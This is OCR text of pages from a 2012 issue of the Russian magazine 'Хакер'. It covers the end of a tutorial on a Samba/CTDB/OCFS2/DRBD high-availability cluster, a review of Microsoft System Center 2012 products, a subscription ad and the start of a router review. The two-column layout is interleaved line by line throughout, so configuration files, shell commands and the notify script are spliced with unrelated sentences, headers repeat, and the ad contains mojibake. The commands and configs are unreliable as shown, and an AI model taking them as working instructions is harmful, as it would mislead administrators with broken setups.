ip_port = 7777
ip_address = 192.168.0.2 [public]
number = 2 comment = public share
name = node2.cluster.local path = /samba/public
cluster = ocfs2 public = yes
writeable = yes
Этот конфиг описывает кластер с именем ocfs2 и двумя нодами: only guest = yes
node1.cluster.local и node2.cluster.local. Имена нод должны совпадать
с именами хостов, поэтому необходимо заранее позаботиться о при- Это простейший пример файла /etc/samba/smb.conf с одной пу-
вязке имен хостов к IP-адресам в файле /etc/hosts обоих узлов. Имя бличной «шарой», а также приватным каталогом /samba/ctdb для хра-
кластера менять не стоит, так как загрузочные скрипты по умолчанию нения данных демона CTDB. Фактически, только первые три строки
будут инициализировать кластер «ocfs2» и не смогут завершить этот необходимы для работы самбы в кластерном варианте, остальное —
процесс, если имя будет другим. Обрати внимание, что в этот раз мы просто оптимизация для работы с OCFS2 и описание сетевого диска.
используем внешние IP-адреса. Каталоги, естественно, необходимо создать заранее:
Копируем конфиг на оба узла и запускаем службу o2cb:
# mkdir /samba/ctdb
# /etc/init.d/o2cb start # mkdir /samba/public
# chmod 777 /samba/public
Теперь можно создать файловую систему на DRBD-устройстве.
Сделать это можно с любого узла: Инициализируем базу паролей:

# mkfs.ocfs2 -L "ocfs2" /dev/drbd0 # smbpasswd -a root

Производительность CTDB-кластера растет пропорционально количеству узлов Проверяем состояние кластера

ХАКЕР 125
ХАКЕР 04
04 /159/
/159/ 2012
2012 0125
SYN/ACK
SYN/ACK Евгений Зобнин ([email protected])

Далее устанавливаем самбу на оба узла и копируем на них pnn:1 192.168.0.2 OK

вышеприведенный конфиг. В качестве окончательного штриха Generation:1362679229
устанавливаем и настраиваем CTDB на обоих узлах: Size:2
hash:0 lmaster:0
# apt-get install ctdb hash:1 lmaster:1
Recovery mode:NORMAL (0)
Сам демон не имеет конфигурационного файла, но, тем не Recovery master:0
менее, требует настройки с помощью скриптов инициализации
и закрепленных за ними конфигов. В Fedora/RedHat это /etc/ Также для проверки соединения можно устроить пинг CTDB-
sysconfig/ctdb, в Debian/Ubuntu — /etc/default/ctdb. Файл необходи- хостов:
мо отредактировать на обоих узлах:
# ctdb ping -n all
# Местонахождение lock-файла мастера восстановления response from 0 time=0.000064 sec (3 clients)
CTDB_RECOVERY_LOCK="/samba/ctdb/lock" response from 1 time=0.000087 sec (9 clients)
# Публичный сетевой интерфейс, используемый для
# обмена данными Наконец запускаем демон Samba:
CTDB_PUBLIC_INTERFACE=eth0
# Список адресов, по которым будет доступен кластер # /etc/init.d/samba start
CTDB_PUBLIC_ADDRESSES=/etc/ctdb/public_addresses
# Перекладываем работу по запуску Samba на CTDB Если при конфигурировании не было допущено ошибок, кла-
CTDB_MANAGES_SAMBA=yes стер уже должен быть готов к подключению клиентов. Со стороны
# Список CTDB-узлов Windows-клиентов кластер должен выглядеть как единое целое, то
CTDB_NODES=/etc/ctdb/nodes есть как один сервер хранения. В большинстве сред рабочего сто-
# Куда писать логи ла для UNIX картина будет та же. Однако если потребуется смон-
CTDB_LOGFILE=/var/log/log.ctdb тировать «диск» из командной строки, придется указать один из
публичных IP-адресов, прописанных в /etc/ctdb/public_addresses:
Далее создаем файл /etc/ctdb/nodes и добавляем в него IP-
адреса узлов Samba, то есть наши два сервера: # mount -t cifs //192.168.0.3/public \
/mnt/samba -o user=ЮЗЕР
192.168.0.1/24 # smbclient //192.168.0.4/public
192.168.0.2/24
Не важно, какой из адресов использовать, — как я уже говорил,
Также создаем файл /etc/ctdb/public_addresses с еще двумя они оба будут доступны ровно до тех пор, пока в строю будет на-
IP-адресами: ходиться хотя бы один сервер.

192.168.0.3/24 МОНИТОРИНГ И ВОССТАНОВЛЕНИЕ

192.168.0.4/24 Просто собрать кластер – только начало, гораздо труднее зани-
маться слежением за его состоянием и предотвращать отказы.
Эти адреса должны отличаться от публичных адресов, но на- К счастью, наша конфигурация всячески этому способствует и
ходиться в той же подсети. Они будут автоматически назначены требует вмешательства, как правило, только на уровне реше-
узлам кластера в качестве дополнительных IP-адресов, по кото- ния железных проблем, — остальные проблемы будут решены
рым и будет происходить подключение клиентов. Это нужно для софтом самостоятельно. Как это работает? Представим себе
автоматического поддержания работоспособности кластера. Если ситуацию, когда один из узлов кластера выходит из строя. Как
один из узлов выйдет из строя, CTDB автоматически присвоит его ведет себя система в этом случае? Первым под удар попадает
IP-адрес другому узлу, и клиенты будут работать, как ни в чем не наше DRBD-устройство, но благодаря режиму master/master
бывало. смерть одного из узлов никак не отразится на функциональ-
Этих настроек должно быть достаточно. Запускаем CTDB на ности другого. Поэтому недоступное устройство просто отклю-
обоих узлах: чается, а второй сервер продолжает функционировать. Второй
компонент, реагирующий на смерть узла, это файловая система
# /etc/init.d/ctdb start OCFS2. Но и здесь все заканчивается достаточно благополучно
благодаря встроенному механизму фенсинга (fencing), который
Если он работает нормально, то команда «ctdb status» вернет просто отключает недоступную ноду от кластера и восстанав-
что-то вроде этого: ливает консистентность файловой системы с помощью отката
незавершенных операций над файлами, проделанными со
Number of nodes:2 сбойного узла. При этом сам сбойный узел отправляется в пере-
pnn:0 192.168.0.1 OK (THIS NODE) загрузку (если, конечно, он не умер окончательно). Следующим
о смерти узла узнает демон CTDB, работающий на живом узле.
Однако, в отличие от двух предыдущих компонентов пирамиды,
он поступает гораздо умнее. Он помечает мертвый узел флагом
UNHEALTHY или DISCONNECTED, назначает его IP-адрес другому
ЧТОБЫ ВОВРЕМЯ РЕАГИРОВАТЬ узлу и посылает всем его клиентам TCP-пакет с нулевым номе-
ром последовательности. Это вынуждает клиентов переуста-
НА ПАДЕНИЕ УЗЛОВ, СЛЕДУЕТ новить соединение с узлом, благодаря чему они автоматически
перебрасываются на живой узел, даже не заметив подмены.
ПРИМЕНЯТЬ РАЗЛИЧНЫЕ Сам протокол CIFS позволяет выполнить такой трюк, в резуль-
тате чего задержка в обслуживании для клиентов составляет
МЕТОДЫ МОНИТОРИНГА всего несколько секунд. Что делать в такой ситуации админу?

126 ХАКЕР
0126 ХАКЕР 04
04 /159/
/159/ 2012
2012
 Неизменно
Неизменно высокая
высокая доступность
доступность

INFO
Если тебе
потребуется собрать
кластер из более чем
двух машин, можно
использовать любую
распределенную
ФС вроде lustre и
GlusterFS.

WARNING
Чтобы Samba
работала
правильно, следует
позаботиться
об управлении
учетными записями
пользователей.
В официальном
руководстве
подробно описано,
как это сделать.

Правим конфиг DRBD Правим конфиг OCFS2

Да в общем-то ничего. Если сервер упал из-за ошибок в ПО или mail foo@bar -s "`hostname` is UNHEALTHY" ...
каких-то непреднамеренных действий со стороны третьих лиц ;;
(пропало питание, не сработал UPS и так далее), то после пере- healthy)
загрузки узел восстановит свое состояние автоматически. То же mail foo@bar -s "`hostname` is HEALTHY" ...
самое справедливо и в отношении поломки одного из внутрен- ;;
них компонентов сервера. Если же умер сам жесткий диск, то esac
после его замены сервер достаточно просто ввести в строй. В
большинстве случаев для этого понадобится выполнить всего За состоянием CTDB в режиме реального времени можно на-
две команды: блюдать с помощью команды «ctdb status». Три первых строки в ее
выводе наиболее информативны, они отражают состояние узлов:
# drbdadm create-md r0 • OK — узел функционирует нормально;
# drbdadm attach r0 • DISCONNECTED — узел недоступен;
• DISABLED — узел отключен администратором, однако он спосо-
Затем начнется синхронизация массива, по окончании которой бен нормально функционировать;
можно вновь смонтировать раздел и перезапустить самбу и CTDB: • UNHEALTHY — существуют проблемы, мешающие подключить
узел к кластеру, при этом сам демон CTDB работает нормально;
# mount /dev/drbd0 • BANNED — узел попал в бан из-за слишком большого количе-
# /etc/init.d/ctdb restart ства попыток восстановить работу, скорее всего проблема в
# /etc/init.d/samba restart неправильной настройке CTDB;
• STOPPED — узел отключен от кластера, но принимает управ-
Чтобы быть в курсе событий и вовремя реагировать на падение ляющие команды;
узлов, следует применять различные методы мониторинга, это мо- • PARTIALLYONLINE — узел работает, но недоступен из внешней
жет быть что угодно, начиная банальным пингом по крону и закан- сети.
чивая специализированными система типа monit. Мы уже не раз
писали в ][ о мониторинге, поэтому я не буду рассказывать об этом Также следует обратить внимание на строку Recovery mode, от-
подробно. Кстати, отслеживать ситуации с проблемами в работе ражающую режим работы кластера. Возможные значения:
CTDB очень просто с помощью скрипта /etc/ctdb/notify.sh, который • vNORMAL — кластер функционирует нормально.
выполняется в тех случаях, когда появляются проблемы в работе • RECOVERY — производится восстановление работы кластера,
узла, и он отключается от CTDB-кластера. Прописать в скрипт на время которого он недоступен.
можно все что угодно, — например, отправку письма админу:
В любой момент узел можно отключить от кластера с помощью
# vi /etc/ctdb/notify.sh команды «ctdb disable» и вернуть с помощью «ctdb enable».
event="$1"
shift ВЫВОДЫ
Сегодня развернуть кластер высокой доступности не так уж и
case $event in сложно. Как видишь, все что для этого требуется — несколько
unhealthy) машин, пара жестких дисков и немного свободного времени. z

ХАКЕР 127
ХАКЕР 04
04 /159/
/159/ 2012
2012 0127
SYN/ACK
SYN/ACK Сергей Яремчук ([email protected])

В этом году корпорация Microsoft практически полностью

IT-РЕШЕНИЯ ОТ обновит линейки своих основных продуктов. Большие
MICROSOFT: ОБЗОР изменения ждут и популярное семейство инструментов
управления System Center, функции которого будут
ГЛАВНЫХ НОВИНОК максимально адаптированы к современным реалиям.
Учитывая, что все RC вышли точно в срок, а в ближайшее
2012 ГОДА время станет доступен RTM, сейчас уже вполне можно
оценить нововведения.

128 ХАКЕР 04 /159/ 2012

 Свежее дыхание

В SCCM 2012 появилась роль Central Administration Site Список ролей сайта SCCM 2012 также претерпел изменения

SYSTEM CENTER CONFIGURATION MANAGER 2012 Такой сайт не обслуживает клиентов и поддерживает ограниченное
Первое, что бросается в глаза, это изменение списка продуктов, количество ролей (AI, Software Update Point, RSP и SHV). Но главное,
входящих в семейство System Configuration. Теперь он выглядит сле- в подчинении CAS может быть только один основной (Primary) сайт,
дующим образом: Configuration Manager, Operations Manager, Service тогда как ранее поддерживалась вложенность нескольких Primary.
Manager, Data Protection Manager (DPM), Virtual Machine Manager Secondary Site требуют наличия SQL-сервера (можно использовать бес-
(VMM), Orchestrator и два новых продукта — Endpoint Protection платный Express). Привычных режимов Native и Mixed нет, теперь просто
(ранее Forefront EP) и AppController. Центральное место в линейке указываем режим работы по HTTP и/или HTTPS, как для сайта в целом,
занимает SCCM 2012 (также известен как v.Next), покрывающий так и на Distribution Point. На разные коллекции можно назначать свои
практически полный цикл управления всей ИТ-инфраструктурой — настройки. Клиент может перебирать между несколькими Management
установка ОС, приложений и обновлений, контроль конфигурации, Point внутри сайта и подключаться к доступному. Это, кстати, основные
инвентаризация софта и оборудования. Поэтому с него и начнем. причины отказа от многочисленных Primary сайтов, так как такой подход
Требования к системе SCCM 2012 немного изменились, те- упрощает структуру, да и уменьшает количество лицензий. Reporting
перь только 64-битные ОС, его можно установить на Win2k8/R2 Point теперь носит имя Reporting Services Point и базируется на SQL
с MSSQL2k8SP1 (x64) или позднее. Хотя точки распространения (DP, Reporting Services, поэтому не получится перенести настройки со старой
Distribution Point) по-прежнему работают на х86 Win. Так как измени- системы. Точки Branch DP уже нет как таковой, SCCM 2012 использует
лась архитектура и логика работы, апгрейд со старых версий SCCM технологию BrachCache. В SCCM 2012 реализована новая концепция, по-
не предусмотрен. Для миграции с SCCM 2007 на SCCM 2012 пред- лучившая название UCM (User Centric Management), — такой подход сде-
ложен мастер (Migration Æ Migration Jobs), который после запуска лал его более дружелюбным к пользователю, предлагая ему большие
будет задавать вопросы о коллекции, объектах и прочих специфи- возможности по контролю и самостоятельному сопровождению системы
ческих настройках. Внешне сам процесс выглядит довольно просто, (естественно, в рамках политик). Теперь именно пользователь выбирает
в результате будут перенесены основные настройки, а также образы, приложения для установки и определяет, когда на компьютер будут за-
обновления, драйвера и прочее. Правда, для этого необходимо будет гружаться обновления, указывая для этого рабочие часы в настройках.
полностью развернуть новую инфраструктуру, в том числе переуста- Ранее все было с точностью наоборот, — основной точкой управления
новить клиента, перенести ресурсы и по окончании процедуры был компьютер, пользователь оставался за кадром и решений никаких
выключить старые сервера. Конечно, некоторая часть данных в новой не принимал. Новый подход видится мне более правильным, поскольку
консоли потребует уточнения, — например, если пакеты хранились администратор не всегда владеет ситуацией и ориентируется лишь на
локально, понадобится указать новый путь, хотя для их размещения роль и группу. Кроме того, индивидуальные требования при большом
обычно используются общие ресурсы, так что особых проблем быть не количестве пользователей учитывать тяжело, а обновление, да еще
должно. База инвентаризации не переносится, она будет заполнена с перезагрузкой, устанавливаемое в неподходящее время, может сильно
новыми данными, поэтому не сохранится и история. помешать. Если за компьютером работает несколько пользователей,
В SCCM2012 интегрирована четвертая версия инструмента ми- один из них назначается основным. Сами приложения разделены на
грации учетных записей USMT (User State Migration Toolkit). Функция обязательные и доступные (Required или Available), также определяется
развертывания ОС OSD (Operating System Deployment) всегда была тип установки (локальная, терминал, виртуальное App-V, Windows Mobile
одной из сильных сторон SCCM, с появлением иерархической модели CAB), зависимости и прочее. Для поиска Available приложений пользо-
(образы не привязаны к определенному сайту) нет необходимости
в сохранении индивидуальных образов, существенно упрощена ра-
бота с WIM. Возможность PXE теперь поддерживается только точками
распространения DP. Поддержка технологии Intel vPro/AMT позволяет
получить доступ к железу, минуя ОС. Одной из целей разработчиков ПОДДЕРЖКА ТЕХНОЛОГИИ
было уменьшение количества серверов, так как ранее из-за специфи-
ческих настроек коллекции часто требовался еще один Primary Site, INTEL VPRO/AMT ПОЗВОЛЯЕТ
в результате даже в небольшой организации серверов могло быть
неприлично много. В иерархии появилась роль Central Administration ПОЛУЧИТЬ ДОСТУП К ЖЕЛЕЗУ,
Site (CAS, аналог Central Primary Site), используемая только для
управления иерархией и отчетов. МИНУЯ ОС
ХАКЕР 04 /159/ 2012 129
SYN\ACK
SYN/ACK

Консоль управления SCCM 2012 выполнена в новом стиле

вателям предложен Software Center, после выбора администратор может

одобрить или блокировать установку. Приложение, в зависимости от SCCM 2012 позволяет выполнять команды на *nix-системах
конкретной ситуации (пользователь работает на ПК, терминале и так
далее), может устанавливаться по-разному. Например, на ПК это будет единственного сервера. Хотя в целях обратной совместимости ввели
локальная установка, а с терминала — виртуальная. Устанавливаемые специальную роль RMS Emulator. Чтобы справиться с нагрузкой, не
программы отслеживаются в узле Monitoring, а не в Status Message обязательно строить кластер, — администраторы могут объединять
Viewer, как в случае SCCM2007. При запуске мастера из Client Custom серверы управления в группы и для Health Service создавать пул
Settings администратор указывает, на кого распространяются настройки ресурсов (Resource Pool) из нескольких Management Server. В обыч-
— для пользователя они или для компьютера. Многие администраторы ном режиме задачи выполняет только один из серверов пула, другие
перед развертыванием проверяют работу на тестовой группе, — теперь подхватывают его роль только в случае недоступности. Получается
все установки из такой среды легко импортируются на рабочие станции. такой себе Failover Cluster без Failover Cluster. Во время установки
Интерфейс реализует рол евую модель управления доступом Role-Based по умолчанию создается три пула: AD Assignment Resource Pool,
Access Control (RBAC), скрывая те настройки, которые недоступны поль- Notifications Resource Pool и All Management Servers Resource Pool,
зователю. Во вкладке Security Roles можно найти 13 предустановленных остальные администратор может настроить самостоятельно.
ролей, при необходимости администратор может самостоятельно добав- Для хранения данных вместо ОЗУ (как это было на Root MS
лять новые, ориентируясь на бизнес-структуру компании. Сами объекты, и требовало мощного сервера) используется только БД. Консоль
коллекции, с которыми может работать роль, определяются в Security управления внешне изменилась мало, зато веб-консоль перерабо-
Scope, а раздавать права можно на уровне коллекции, а не сайта. В SCCM тана существенно, но осваивается легко. Кроме Windows, полно-
2012 интерфейс консоли обновлен и выполнен в стиле MS Office, он со- ценно OpsMgr 2012 поддерживает Linux и *nix. Уже сегодня доступны
стоит из так называемых Wunderbar, содержащих ссылки на меню управ- пакеты управления (Management Pack) для поддержки популярных
ления, и уже не является MMC. Конечно, некоторое время приходится серверов приложений: Apache Tomcat, IBM WebSphere, Java EE, Oracle
привыкать к расположению пунктов меню, но затем новый интерфейс WebLogic, Red Hat JBoss и других. Обеспечивается диагностика и веб-
находишь вполне удобным и логичным. Еще одно важное изменение, приложений, созданных на базе .NET и J2EE и Windows Azure.
— на клиенте устанавливается специальная программа Client Health Доступный набор командлетов PowerShell (имя включает SCOM/
(ccmeval.exe), отправляющая по расписанию сообщение о его текущем SC) теперь дает возможность управлять в том числе и *nix-системами.
состоянии и возвращающая его в рабочее состояние в случае проблем. Чтобы получить список всех командлетов, достаточно ввести:
Также SCCM 2012 получает некоторый функционал SC AppController, из-
вестный под кодовым именем Concero (лат. «связывать»), позволяющий PS> Get-Command -Module OperationsManager
управлять SaaS услугами и приложениями в приватных облаках, по-
строенных на Windows Server, Hyper-V и Virtual Machine Manager 2012, и в Пакет управления UNIX/Linux Shell Command Template предлагает
публичных облаках на базе Windows Azure. Владельцы могут разверты- шаблоны, позволяющие создавать правила, задания и мониторы,
вать VM, получать доступ к ресурсам, использовать несколько подписок используя команды оболочки непосредственно с панели OpsMgr.
Windows Azure, копировать VHD-образы. В сравнении с OpsMgr 2007 сам процесс настройки при помощи
мастеров — упрост. В финальном релизе данный пакет будет уста-
SYSTEM CENTER OPERATIONS MANAGER 2012 навливаться по умолчанию, для RC его нужно скачать и установить
Теперь OpsMgr является основным инструментом для управления отдельно.
частным облаком, включая возможности мониторинга сетевых
устройств и технологию контроля производительности приложений MICROSOFT DEPLOYMENT TOOLKIT 2012
AVICode. В частности, кроме серверов можно обнаруживать и отсле- Главное нововведение в MDT — улучшенная интеграция с SCCM 2012
живать маршрутизаторы, в том числе отдельные интерфейсы и порты, и AD, а также поддержка DaRT (Diagnostic and Repair Toolkit, входит
а также VLAN (обнаруживаются автоматически). Поддерживает в Desktop Optimization Pack).
SNMPv3, IPv4/IPv6, ведет статистику по трафику и скорости, осущест- При этом MDT2012 полностью вписывается в новую консоль SCCM
вляет контроль работы протокола HSRP и многое другое. 2012 (может работать и с SCCM2007) и понимает измененную модель
В новой версии OpsMgr все сервера управления стали равно- приложений (терминальные, виртуальные и так далее). Собствен-
правными, то есть роли Root Management Server больше нет, кон- но, процесс работы с MDT мало изменился, отличия в интерфейсе
фигурацию агентов вычисляет каждый Management Server. Теперь практически не бросаются в глаза. В настройках появились два новых
с OpsMgr 2012 вся инфраструктура не зависит от доступности одного Task Sequences: Deploy to VHD Client Task Sequence и Deploy to VHD

130 ХАКЕР 04 /159/ 2012

 Свежее дыхание

INFO
• Обзор
возможностей
SCCM2007 ищи в ][
08.09/09.09/01.10.

• Установка
и настройка SCOM
2007 описана в ][
08.11.

• Процесс
развертывания FEP
2007 освещен в ]
[ 09.11.

• Подробно о работе
с MDT 2010 читай в ][
10.09.

WWW
• Страница SCCM
2012: clck.ru/eN3T.

• Страница MDT 2012:

microsoft.com/mdt.

Настройка сканирования SC Endpoint Protection 2012

Server Task Sequence (развертывать VDI, клиентский ПК или сервер). Нововведений очень много, и они затронули все без исключения
Конечно, при помощи MDT 2010 также было возможно произвести подкомпоненты сервера. Одни направлены на повышение произво-
P2V миграцию, задействуя Sysinternal Disk2VHD (на TechNet доступна дительности и доступности, другие позволили расширить круг задач.
инструкция clck.ru/fQOp), но процесс не совсем тривиален и не всем К слову, в тестировании CTP-версии участвовало более 100 000 поль-
понятен. Теперь это стандартная операция, все настройки которой зователей, которые высказали свое мнение по поводу исправлений.
выполняются за несколько кликов мышкой. Также заявлено, что Приведем лишь некоторые, наиболее важные.
MDT 2012 будет поддерживать грядущую ОС Win8. Используемый для Сисадмины наверняка оценят поддержку установки на Win2k8R2
редактирования установок в MDT_FOLDER/Scripts/UDIWizard_Config. в режиме Server Core: теперь для развертывания SQL-сервера не тре-
xml инструмент UDI Designer (User-Driven Installation, появился буется графическая оболочка. Представлено несколько инструментов
в MTD2010 Update 1) получил новый интерфейс и возможности. Так миграции: Upgrade Advisor, Distributed Replay и Migration Assistant
вместо двух сценариев из коробки теперь их три: New Computer, (SSMA). Базирующаяся на концепции групп доступности (Availability
Refresh и Replace. Администратор может просмотреть список всех Groups) технология HADR (High-Availability and Disaster Recovery)
сценариев в одном окне и изменить расположение простым перета- позволяет повысить доступность экземпляров SQL Server за счет
скиванием. Сам мастер расширяем, хотя процесс не совсем прост (на дополнительных копий БД. Такие копии могут работать в режиме
TechNet приводится пример кода). А еще — усовершенствован мастер «только чтение» и использоваться, например, для отчетов, что снимет
Lite Touch, улучшена миграция учетной записи, реализована полная нагрузку с рабочей БД.
поддержка WinRE. Все задачи можно решить при помощи PowerShell. Реализована поддержка кластера на разных подсетях (SQL
Поддержка старых ОС WinXP и Win2k3 сохранена. Server Multi-Subnet Clustering). Для очистки дубликатов в данных
предложен новый компонент Data Quality Services. Инструменты
НОВОЕ В MS SQL SERVER 2012 (DENALI) управления позволяют эффективно манипулировать произво-
Вероятно, SQL Server’у будет принадлежать первенство в линей- дительностью в такой многопользовательской среде как частное
ке обновлений 2012, так как его выход планируется уже весной. облако. Новый компонент Power View (Crescent) с богатыми воз-

ХАКЕР 04 /159/ 2012 131

SYN\ACK
SYN/ACK

AppController позволяет управлять сервисами внутри облака

можностями представления информации для анализа позволяет сути, AppController призван дополнить все имеющиеся сегодня
пользователям самостоятельно строить отчеты на основе BISM инструменты, с которыми приходится иметь дело администра-
(Business Intelligence Semantic Model). Семантическая модель тору: SCVMM, SSP (Virtual Machine Manager Self-Service Portal
бизнес-аналитики BISM объединяет в себе модели данных UDM или Solution Accelerator), DDTK (Dynamic Datacenter Toolkit)
и табличную PowerPivot. Улучшены механизмы полнотекстового и консоль Azure Platform. AppController позволяет владельцам
поиска: по отдельным свойствам через IFilter, и NEAR, позволяю- приложений создавать ресурсы с использованием шаблонов
щий указать порядок следования слов и расстояние. Добавлены и библиотек, управлять ими, отслеживать активности, выпол-
новые разрешения и механизм пользовательских серверных нять журналирование всех действий и многое другое. Например,
ролей, добавлена поддержка SHA2 256/512. Также предложена SQL разворачивать приложения могут сами менеджеры подразделе-
Express LocalDB – легковесная версия БД с поддержкой всех функ- ний, а ИТ-персонал просто контролирует этот процесс. Каждый
ций, не требующая конфигурирования и прав администратора. пользователь получает веб-интерфейс, где будут доступны только
определенные (в зависимости от его роли) функции.
APPCONTROLLER 2012
AppController 2012 — новое решение в семействе System ЗАКЛЮЧЕНИЕ
Center, предназначено для контроля приложений внутри об- Большая часть изменений носит позитивный характер, поскольку по-
лака (публичного и частного), развертывания и управления зволяет упростить работу как админу, так и пользователям. Осталось
сервисами. Это единый интерфейс ко всем ЦОД и Azure. По дождаться финальных релизов. z

ЛИЦЕНЗИРОВАНИЕ ЛИНЕЙКИ SYSTEM CENTER 2012

Модель лицензирования всех продуктов линейки System Cen- Первая позволяет управлять только двумя виртуальными ОС (на
ter 2012 полностью изменилась (подробнее clck.ru/ePUN), она не частном или публичном облаке), у второй ограничения отсутствуют.
привязывается к решению и оптимизирована под использование Причем в пакет лицензий уже включены права на использование
в рамках private cloud. Теперь все лицензии включают в себя серверов управления и SQL Server, - отдельно их покупать тоже не
право на использование всего функционала всех продуктов потребуется.
линейки. Другими словами, отдельные лицензии на продукты Суммарно стоимость лицензии выросла, но она нивелируется
исчезли, и нет ограничений по возможностям. При этом консоли за счет того, что в нее включены лицензии на подкомпоненты.
управления уже не требуют лицензии. Хотя одно ограничение Клиентские лицензии по-прежнему требуются, но теперь они также
все же есть — каждая лицензия покрывает 2 физических CPU. объединены и будут доступны в рамках набора System Center Client
Доступны лишь два варианта: System Center 2012 Standard и Data- ML Suite, в который входят лицензии для Service Manager, Operations
center, которые отличаются лицензированием виртуальных сред. Manager, Data Protection Manager и Orchestrator. Отдельно доступны

132 ХАКЕР 04 /159/ 2012

 ГОДОВАЯ

Подписка ЭКОНОМИЯ
500 руб.

1. Разборчиво заполни подписной купон и кви-

танцию, вырезав их из журнала, сделав ксе-
рокопию или распечатав с сайта shop.glc.ru.
12 НОМЕРОВ — 2200 РУБ.
2. Оплати подписку через любой банк.
3. Вышли в редакцию копию подписных доку-
6 НОМЕРОВ — 1260 РУБ.
ментов — купона и квитанции — любым из УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ
нижеперечисленных способов: ЖУРНАЛ НАМНОГО ДЕШЕВЛЕ!
• на e-mail: [email protected];
• по факсу: (495) 545-09-06;
ПРИ ПОДПИСКЕ
¶¡«¦±²«©¦ °¬¡¤©®¼ ¥¬À GOOGLE CHROME 030

±¦
• почтой по адресу: 115280, Москва,

«¯ ·¦
­¦ ®¡
x ²¦®³À¢±½ 09 (152) 2011

®¥ : 210
¯£ Ñ.
¡®
®¡
À
LULZSEC НА КОМПЛЕКТ ЖУРНАЛОВ
²¦®³À¢±½ 09 (152) 2011

ул. Ленинская Слобода, 19, Омега плаза, £¨¬¯­ ¥¬À ±§¡«©:

082

LULZSEC / £¨¬¯­ ¥¬À ±§¡«© ·±´ ²¦®¡³ ²¹¡ FOX NEWS

5 эт., офис № 21,
ÏÐÀÂÈËÜÍÛÅ ÕÀÊÈ
ÄËß ÈÍÒÅÐÔÅÉÑÀ
WINDOWS 7
·±´, ²¦®¡³ ²¹¡,
FOX NEWS
ЖЕЛЕЗО + ХАКЕР + 2 DVD: —
ООО «Гейм Лэнд», отдел подписки. ÂÇËÎÌ PHPMYADMIN
Ñ ÏÎÌÎÙÜÞ ÍÎÂÎÃÎ ÁÀÃÀ 064
ОДИН НОМЕР ВСЕГО ЗА 162 РУБЛЯ
(НА 35% ДЕШЕВЛЕ, ЧЕМ В РОЗНИЦУ)
ÌÎÁÈËÜÍÀß ÌÀËÂÀÐÜ
ÄËß ÏËÀÒÔÎÐÌÛ ANDROID 070
ÏÐß×ÅÌ, ÎÁÔÓÑÖÈÐÓÅÌ
152

È ÊÐÈÏÒÓÅÌ JAVASCRIPT 050

ВНИМАНИЕ! ЕСЛИ ПРОИЗВЕСТИ

ОПЛАТУ В СЕНТЯБРЕ, ТО ПОДПИСКУ ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА)
МОЖНО ОФОРМИТЬ С НОЯБРЯ. ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ)
ЕДИНАЯ ЦЕНА ПО ВСЕЙ РОССИИ. ДОСТАВКА ЕСТЬ ВОПРОСЫ? Пиши на [email protected] или звони по бесплатным телефо-
ЗА СЧЕТ ИЗДАТЕЛЯ, В ТОМ ЧИСЛЕ КУРЬЕРОМ нам 8(495)663-82-77 (для москвичей) и 8 (800) 200-3-999 (для жителей
ПО МОСКВЕ В ПРЕДЕЛАХ МКАД других регионов России, абонентов сетей МТС, БиЛайн и Мегафон).

ПРОШУ ОФОРМИТЬ ПОДПИСКУ

НА ЖУРНАЛ «ХАКЕР»
FERRUM Даниил Либарц

Сетевой
ТЕСТИРОВАНИЕ ТОПОВЫХ
РОУТЕРОВ
еспроводной маршрутизатор – это не просто коробочка, же будем пользоваться throughput, для объективности. Каждый
Б в которую можно «воткнуть интернет» и раздавать его
по проводам и воздуху. Такие устройства таят в себе
тест идет не менее минуты. На данном этапе тестирование можно
поделить на три составляющие:
множество интересных функций, о которых ты можешь даже и не 1) Тест производительности протокола PPTP. На ПК с Microsoft
догадываться. В этом обзоре мы собрали самые производитель- Windows Server 2008 R2 Standard поднимается PPTP-сервер, затем
ные бытовые роутеры от известных компаний. Итак, втыкай свой роутер настраивается на подключение по данному протоколу через
патчкорд, – поехали! WAN-порт. К LAN-порту подключается клиент.
2) Тест производительности NAT. Настройка аналогична первому
МЕТОДИКА ТЕСТИРОВАНИЯ случаю, только подключение настраивается через Static IP.
Вначале давай ознакомимся с методикой тестирования роутеров. 3) Тест Wi-Fi. К LAN-порту маршрутизатора подключается один
Начнем с железа. Нам понадобятся сервер, клиент и ноутбук. Те- клиент, а по беспроводной сети – второй. Таким образом, пропу-
стировать будем на платформе Windows, поэтому на сервере уста- ская трафик между двумя ПК, мы можем оценить производитель-
новлена Microsoft Windows Server 2008 R2 Standard, а на остальных ность именно беспроводной сети. Также настраивается шифрова-
ПК – Microsoft Windows 7 Ultimate x64. Для измерения результатов ние WPA2-PSK с ключом AES.
и нагрузки канала будет использоваться пакет от компании Ixia, Стоит отметить, что для теста будут использоваться одноименные
содержащий в себе конечные точки (endpoints, должны быть уста- WiFi-«свистки»: ASUS USB-N53, D-Link DWA-160, TP-Link TL-
новлены на всех ПК, участвующих в тесте) и консоль управления WN821N и ZyXEL NWD2205 EE. Для остальных устройств применяем
Ixchariot. Ixchariot имеет в своем арсенале множество скриптов, мы адаптер ASUS USB-N53.

134 ХАКЕР 04 /159/ 2012

 Сетевой форсаж

форсаж
ASUS RT-N66U
«Ой, какой красивенький», – фраза девушки техноманьяка, ко-
торый приобрел себе ASUS RT-N66U. Действительно, этот роутер
имеет необычный и привлекательный внешний вид. В компа-
нии ASUS учли недостатки предыдущей модели ASUS RT-N56U
и сделали корпус из матового пластика вместо глянца, а кроме
того роутер теперь имеет три внешних антенны, располагается
горизонтально, что более удобно, и его стало возможно повесить
на стену. В общем, внешние недоработки предыдущего ASUS RT-
N56U были исправлены.
Роутер ASUS RT-N66U сочетает в себе мощь и простоту настрой-
ки, интуитивно понятный пользовательский интерфейс позволит
разобраться в настройках даже новичку. Устройство оснащено
двумя портами USB, так что ты можешь одновременно использовать
внешний накопитель и принтер для доступа к ним по сети. ASUS RT-
N66U напичкан серьезным железом и потому показывает отличные
результаты в тестах: обошел конкурентов своего класса во всем,
кроме одного параметра – скорость PPTP. Однако сегодня трудно СКОРО В
найти провайдера, который бы обеспечивал доступ к интернету ПРОДАЖЕ
на скорости, превышающей 100 Мбит/с, а с этим ASUS RT-N66U
справится легко. Кстати, этот роутер поддерживает Dual Access, что
очень важно для большинства отечественных провайдеров.

ХАКЕР 04 /159/ 2012 135

FERRUM

D-LINK DSR-500N
ВНЕ КОНКУРСА
трогий и лаконичный внешний вид D-Link DSR-500N
С говорит нам о серьезной начинке и профессиональной
направленности устройства. Крепления для серверной
